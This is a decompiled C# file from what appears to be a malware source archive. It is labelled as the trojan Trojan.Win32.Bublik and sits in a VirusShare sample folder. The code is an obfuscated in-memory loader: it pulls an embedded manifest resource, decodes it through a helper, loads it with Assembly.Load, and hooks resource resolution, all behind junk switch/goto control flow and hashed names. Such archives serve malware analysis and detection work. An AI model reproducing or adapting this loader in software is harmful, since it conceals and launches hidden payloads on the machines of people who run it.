MalwareSourceCode/MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4/ced138b6eee8b5fea3f196334f6720805.cs
2022-08-18 06:28:56 -05:00

95 lines
3.2 KiB
C#

// Decompiled with JetBrains decompiler
// Type: A.ced138b6eee8b5fea3f196334f6720805
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
using System;
using System.Reflection;
namespace A
{
internal class ced138b6eee8b5fea3f196334f6720805
{
private static readonly Assembly c7956d9417023ac40f6a0eb5665bf366c;
static ced138b6eee8b5fea3f196334f6720805()
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c != null)
return;
label_1:
switch (3)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.\u002Ecctor);
}
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string name = executingAssembly.GetName().Name;
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (name == manifestResourceName)
{
label_6:
switch (3)
{
case 0:
goto label_6;
default:
ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c = Assembly.Load(c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(name)));
return;
}
}
}
label_10:
switch (7)
{
case 0:
goto label_10;
default:
return;
}
}
}
internal static void c496a7d7e6524413c65d8aa7379640bb1() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
private static Assembly c3e00543c0030da506a3c9417db159586(
object c932adab82a8e17f3df4be69b90bf6c46,
ResolveEventArgs c40515e8f64a790a3f5078c209ce553e3)
{
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c == null)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
label_1:
switch (7)
{
case 0:
goto label_1;
default:
if (false)
{
// ISSUE: method reference
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
}
foreach (string manifestResourceName in ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c.GetManifestResourceNames())
{
if (manifestResourceName == c40515e8f64a790a3f5078c209ce553e3.Name)
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
}
label_9:
switch (4)
{
case 0:
goto label_9;
default:
return (Assembly) null;
}
}
}
}
}